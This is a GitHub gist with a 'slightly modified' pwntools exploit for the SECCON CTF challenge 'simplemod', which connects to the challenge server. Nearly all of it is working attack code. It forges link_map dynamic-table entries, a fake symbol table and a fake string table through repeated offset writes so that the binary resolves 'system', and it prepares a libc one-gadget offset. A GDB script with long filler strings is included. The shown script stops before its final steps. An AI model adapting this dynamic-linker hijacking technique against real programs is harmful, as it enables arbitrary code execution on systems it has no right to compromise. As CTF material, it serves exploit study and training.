Skip to content

Instantly share code, notes, and snippets.

@galli-leo
Created November 15, 2022 09:46
Show Gist options
  • Save galli-leo/31ddf1861a19ffffba9bf1eb7d29aadb to your computer and use it in GitHub Desktop.
Save galli-leo/31ddf1861a19ffffba9bf1eb7d29aadb to your computer and use it in GitHub Desktop.
Slightly modified exploit for simplemod
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host simplemod.seccon.games --port 7250 chall
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('chall')
lib = ELF('libmod.so')
context.terminal = ["tmux", "split", "-h"]
DT_NULL = 0 # /* Marks end of dynamic section */
DT_NEEDED = 1 # /* Name of needed library */
DT_PLTRELSZ = 2 # /* Size in bytes of PLT relocs */
DT_PLTGOT = 3 # /* Processor defined value */
DT_HASH = 4 # /* Address of symbol hash table */
DT_STRTAB = 5 # /* Address of string table */
DT_SYMTAB = 6 # /* Address of symbol table */
DT_RELA = 7 # /* Address of Rela relocs */
DT_RELASZ = 8 # /* Total size of Rela relocs */
DT_RELAENT = 9 # /* Size of one Rela reloc */
DT_STRSZ = 10 # /* Size of string table */
DT_SYMENT = 11 # /* Size of one symbol table entry */
DT_INIT = 12 # /* Address of init function */
DT_FINI = 13 # /* Address of termination function */
DT_SONAME = 14 # /* Name of shared object */
DT_RPATH = 15 # /* Library search path (deprecated) */
DT_SYMBOLIC = 16 # /* Start symbol search here */
DT_REL = 17 # /* Address of Rel relocs */
DT_RELSZ = 18 # /* Total size of Rel relocs */
DT_RELENT = 19 # /* Size of one Rel reloc */
DT_PLTREL = 20 # /* Type of reloc in PLT */
DT_DEBUG = 21 # /* For debugging; unspecified */
DT_TEXTREL = 22 # /* Reloc might modify .text */
DT_JMPREL = 23 # /* Address of PLT relocs */
DT_BIND_NOW = 24 # /* Process relocations of object */
DT_INIT_ARRAY = 25 # /* Array with addresses of init fct */
DT_FINI_ARRAY = 26 # /* Array with addresses of fini fct */
DT_INIT_ARRAYSZ = 27 # /* Size in bytes of DT_INIT_ARRAY */
DT_FINI_ARRAYSZ = 28 # /* Size in bytes of DT_FINI_ARRAY */
DT_RUNPATH = 29 # /* Library search path */
DT_FLAGS = 30 # /* Flags for the object being loaded */
DT_ENCODING = 32 # /* Start of encoded range */
DT_PREINIT_ARRAY = 32 # /* Array with addresses of preinit fct*/
DT_PREINIT_ARRAYSZ = 33 # /* size in bytes of DT_PREINIT_ARRAY */
DT_SYMTAB_SHNDX = 34 # /* Address of SYMTAB_SHNDX section */
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or 'simplemod.seccon.games'
port = int(args.PORT or 7250)
def start_local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def start_remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return start_local(argv, *a, env={"LD_LIBRARY_PATH": os.path.abspath(os.path.dirname(__file__))}, stdin=PTY, **kw)
else:
return start_remote(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
# tbreak main
dir /usr/src/glibc/glibc-2.35/elf
dir /usr/src/glibc/glibc-2.31/elf
b _dl_fini
b dl-fini.c:146
define over
# set *(char [1153]*)0x00007ffff7fbb220 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
set *(char [0x2001]*)0x00007ffff7fba0c0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# set ((struct link_map*)0x00007ffff7fbb220)->l_next = 0x7ffff7fbb730
# set ((struct link_map*)0x00007ffff7fbb220)->l_real = 0x00007ffff7fbb220
# set ((struct link_map*)0x00007ffff7fbb220)->l_initfini = 0x7ffff7fbbc10
end
define brs
b dl-lookup.c:404
b getint
b menu
b _dl_fixup
# b do_lookup_unique
# b __stack_chk_fail
# b *(0x00007ffff7d8e000+0x000000000005a49e)
b system
# set *(char [16]*)0x7ffff7fbb118 = "system"
end
set $l = (struct link_map*)0x7ffff7fbb220
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: PIE enabled
NUM_OFFSETS = 0
def do_exploit(link_map_add = 0x0, main_off=0x0):
global NUM_OFFSETS
NUM_OFFSETS = 0
def do_offset(offset, val):
global NUM_OFFSETS
io.sendlineafter(b"> ", b"1")
io.sendlineafter(b"offset:", str(offset).encode())
io.sendlineafter(b"value:", str(val).encode())
NUM_OFFSETS += 1
log.info("USED OFFSETS: %d/%d (%d)", NUM_OFFSETS, 30, 30 - NUM_OFFSETS)
def do_bs(offset, bs: bytes):
idx = 0
for b in bs:
do_offset(offset + idx, b)
idx += 1
def do_p64(offset, val):
do_bs(offset, p64(val))
def do_exit():
io.sendlineafter(b"> ", "0")
io = start()
LINK_MAP_OFF = 0x11a0
LINK_MAP_OFF = 0xf80
LINK_MAP_OFF += link_map_add
LIBC_LINK_MAP_OFF = LINK_MAP_OFF + 0x520
NEXT_OFF = 24
INFO_OFF = 64
FLAG_OFF = 798
GNU_SHIFT_OFF = 764
GNU_CHAIN_OFF = 784
BIN_BASE = 0x007ffff7fb6000
BUFFER_BASE = 0x00007ffff7fba080
BUFFER_BASE = BIN_BASE + 0x4080
BUFFER_OFF = 0x4080
def info_off(dt):
return LINK_MAP_OFF + INFO_OFF + 8*dt
def libc_info_off(dt):
return LIBC_LINK_MAP_OFF + INFO_OFF + 8*dt
log.info("Setting this flag, so that D_PTR is relative to base address!")
flag = 0x4 | (1 << 5)
# do_offset(LINK_MAP_OFF + FLAG_OFF, flag)
# log.info("This should cause the resolution to fail")
# do_offset(LINK_MAP_OFF + GNU_SHIFT_OFF, 7)
def do_brute(off, val):
do_offset(off, val & 0xff)
do_offset(off+1, (val >> 8) & 0xff)
# new_hash=0xcbff3bcd
# do_offset(0, 0)
# pause()
# log.info("Causing over")
# do_exit()
# io.interactive()
GET_IMM_SYMIDX = 0x9
log.info("create fake symtab info element")
RELOC_IDX = 0x2
FAKE_SYMTAB_INFO_IDX = 27
FAKE_STRTAB_INFO_IDX = 28
FAKE_SYMTAB_INFO_BUF_OFF = 0x40 #info_off(FAKE_SYMTAB_INFO_IDX)
FAKE_SYMTAB_INFO_BUF_OFF = info_off(FAKE_SYMTAB_INFO_IDX)
FAKE_SYMTAB_INFO_BIN_OFF = FAKE_SYMTAB_INFO_BUF_OFF + BUFFER_BASE
FAKE_STRTAB_INFO_BUF_OFF = 0x50 # info_off(FAKE_STRTAB_INFO_IDX)
FAKE_STRTAB_INFO_BUF_OFF = info_off(FAKE_STRTAB_INFO_IDX)
FAKE_STRTAB_INFO_BIN_OFF = FAKE_STRTAB_INFO_BUF_OFF + BUFFER_BASE
FAKE_SYMTAB_BUF_OFF = 0xf0 - 0x18*GET_IMM_SYMIDX #0x60 - 0x18*GET_IMM_SYMIDX + 0x40
FAKE_SYMTAB_BIN_OFF = FAKE_SYMTAB_BUF_OFF + BUFFER_OFF
FAKE_SYMTAB_BIN_OFF = FAKE_SYMTAB_BUF_OFF + BUFFER_BASE
FAKE_STRTAB_BUF_OFF = 0x60
FAKE_STRTAB_BUF_OFF = FAKE_SYMTAB_BUF_OFF
FAKE_STRTAB_BIN_OFF = FAKE_STRTAB_BUF_OFF + BUFFER_OFF
FAKE_STRTAB_BIN_OFF = FAKE_STRTAB_BUF_OFF + BUFFER_BASE
FAKE_RELOC_BUF_OFF = FAKE_STRTAB_BUF_OFF+RELOC_IDX*0x18
FAKE_SYM_IDX = 1
FAKE_SYM_IDX = 11
FAKE_SYM_IDX = 6
FAKE_SYM_BUF_OFF = FAKE_SYMTAB_BUF_OFF + 0x18*FAKE_SYM_IDX
FAKE_SYM_STR_OFF = 0x70
# FAKE_SYM_STR_OFF = 0x1080
SYMTAB_BASE = BIN_BASE+0x328
STRTAB_BASE = BIN_BASE+0x460
do_bs(FAKE_SYMTAB_INFO_BUF_OFF, p16((FAKE_SYMTAB_BIN_OFF) & 0xffff))
do_brute(info_off(DT_SYMTAB), FAKE_SYMTAB_INFO_BIN_OFF-8)
# do_bs(FAKE_STRTAB_INFO_BUF_OFF, p16((STRTAB_BASE - BIN_BASE) & 0xffff))
# do_bs(FAKE_STRTAB_INFO_BUF_OFF, p16((FAKE_STRTAB_BIN_OFF) & 0xffff))
# do_brute(info_off(DT_STRTAB), FAKE_STRTAB_INFO_BIN_OFF-8)
do_brute(info_off(DT_STRTAB), FAKE_SYMTAB_INFO_BIN_OFF-8)
# do_exit()
# io.interactive()
# do_brute(info_off(DT_JMPREL), FAKE_STRTAB_INFO_BIN_OFF-8)
# do_brute(info_off(DT_JMPREL), FAKE_SYMTAB_INFO_BIN_OFF-8)
FAKE_VER_INFO_BUF_OFF = 0x90
FAKE_VER_INFO_BIN_OFF = FAKE_VER_INFO_BUF_OFF + BUFFER_BASE
# do_brute(info_off(0), FAKE_VER_INFO_BIN_OFF-8)
FAKE_BUCKETS_INFO_BUF_OFF = info_off(FAKE_SYMTAB_INFO_IDX)
FAKE_BUCKETS_INFO_BIN_OFF = BUFFER_BASE + FAKE_BUCKETS_INFO_BUF_OFF
FAKE_BUCKETS_BUF_OFF = 0x80
FAKE_BUCKETS_BIN_OFF = FAKE_BUCKETS_BUF_OFF + BUFFER_BASE
# do_brute(LINK_MAP_OFF+GNU_CHAIN_OFF, FAKE_BUCKETS_INFO_BIN_OFF)
# do_brute(LINK_MAP_OFF+GNU_CHAIN_OFF, FAKE_BUCKETS_BIN_OFF - 0xb*4)
# do_bs(FAKE_BUCKETS_BUF_OFF, p32(0xcbff3bcd))
do_bs(FAKE_STRTAB_BUF_OFF, b"exit_imm")
log.info("Constructing call to system!")
do_bs(FAKE_STRTAB_BUF_OFF + FAKE_SYM_STR_OFF, b"system")
FAKE_SEC_SYM_OFF = FAKE_SYMTAB_BUF_OFF + 0x18*FAKE_SYM_IDX
do_offset(FAKE_SEC_SYM_OFF + 0x0, FAKE_SYM_STR_OFF)
# fake the relocation
# do_bs(FAKE_RELOC_BUF_OFF+0x8, p8(7))
# do_bs(FAKE_RELOC_BUF_OFF, p8(0x38))
# do_bs(FAKE_RELOC_BUF_OFF+1, p8(0x40))
# do_bs(FAKE_RELOC_BUF_OFF+0x8+4, p8(FAKE_SYM_IDX))
ONE_GADGET = 0xebcf8
TARGET_FUN = 0xEB460
ONE_GADGET = 0x000000000005a49e
TARGET_FUN = 0x51600
BASE_ADDR_DIFF = ONE_GADGET - TARGET_FUN
BASE_ADDR_DIFF += main_off
log.info("OFFSET LIBC HERE, SO THAT WE CAN CALL execl+0x%x", BASE_ADDR_DIFF)
LIBC_BASE_ADDR = 0x00007ffff7d8e000
BASE_ADDR_NEW = LIBC_BASE_ADDR + BASE_ADDR_DIFF
# do_offset(LIBC_LINK_MAP_OFF, (BASE_ADDR_NEW & 0xff))
